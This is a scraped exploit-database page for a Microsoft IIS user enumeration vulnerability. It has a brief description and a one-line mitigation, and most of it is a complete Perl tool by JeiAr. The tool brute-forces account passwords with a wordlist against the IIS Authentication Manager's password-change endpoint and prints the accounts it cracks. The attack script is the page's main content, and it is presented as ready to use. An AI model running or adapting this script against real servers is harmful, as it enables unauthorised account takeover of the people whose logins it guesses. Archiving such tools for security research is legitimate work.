Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Microsoft IIS User Enumeration Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Internet Information Services (IIS)
by:
JeiAr
5.5
CVSS
MEDIUM
User Enumeration
200
CWE
Product Name: Internet Information Services (IIS)
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE: a:microsoft:iis
Metasploit:
Other Scripts:
Platforms Tested: Windows
2003

Microsoft IIS User Enumeration Vulnerability

Microsoft IIS is prone to an issue where the existence of users may be revealed to remote attackers. The vulnerability exists when users attempt to authenticate against a vulnerable system. IIS will generate an error page if authentication fails. Different messages are generated depending on whether the user exists or not.

Mitigation:

Ensure that the error messages generated by IIS are not revealing any sensitive information about the existence of users.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7492/info

Microsoft IIS is prone to an issue where the existence of users may be revealed to remote attackers. The vulnerability exists when users attempt to authenticate against a vulnerable system.

IIS will generate an error page if authentication fails. Different messages are generated depending on whether the user exists or not.

##########################################################################
#################
# Miscrosoft IIS Authentication Manager BruteForce Tool - By JeiAr
http://www.gulftech.org
##########################################################################
#################
# This tool can be used to brute force user accounts via dictionary
attack on the Microsoft
# IIS Authentication Manager. More details here
http://www.securityfocus.com/archive/1/8515
##########################################################################
#################

use LWP::UserAgent;

##########################################################################
#################
# Time to create the new LWP User Agent, Clear the screen, And print out
the scripts header
##########################################################################
#################

$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
system('cls');
&header;

##########################################################################
#################
# Gather all user inputted data. Such as the domain name, host and
location of the wordlist
##########################################################################
#################
 
print "Host: ";
$host=<STDIN>;
chomp $host;
print "Domain: ";
$domain=<STDIN>;
chomp $domain;
print "Account: ";
$account=<STDIN>;
chomp $account;
print "Word List: ";
$list=<STDIN>;
chomp $list;

##########################################################################
#################
# Opens the wordlist and puts the data into an array. afterward setting
the count variables
##########################################################################
#################

open (DATAFILE, "$list");
@datafile = <DATAFILE>;
chomp(@datafile);
$length = @datafile;
$count = 0;
$found = 0;

&space;
print "Cracked Accounts\n";
print "----------------\n";

##########################################################################
#################
# Creates the HTTP request, Checks the responses, then prints out the
username if it exists
##########################################################################
#################

while ($count < $length) {
$password = (@datafile[$count]);
my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
   $req->content_type('application/x-www-form-urlencoded');
   $req->content
("domain=$domain&acct=$account&old=$password&new=$password&new2=$password"
);
my $res = $ua->request($req);
$pattern = "Password successfully changed";  
$_ = $res->content;
if (/$pattern/) {
print "$account : $password\n";
last if (/$pattern/);
  }
 $count++;
}

##########################################################################
#################
# Thats all folks. Prints out the final details and footer. Rest is just
the subroutines :)
##########################################################################
#################

&space;
&footer;

sub header {
print "IIS Auth Manager Brute Forcing Tool By JeiAr
[http://www.gulftech.org] \n";
print "-------------------------------------------------------------------
--- \n";
}

sub footer {
print "Session Results:\n";
print "--------------------\n";
print "Number Of Words : $length \n";
print "Number Of Tries : $count  \n";
}

sub space {
print "\n" x2;
}

Navigation

Suggest Exploit

Services By CQR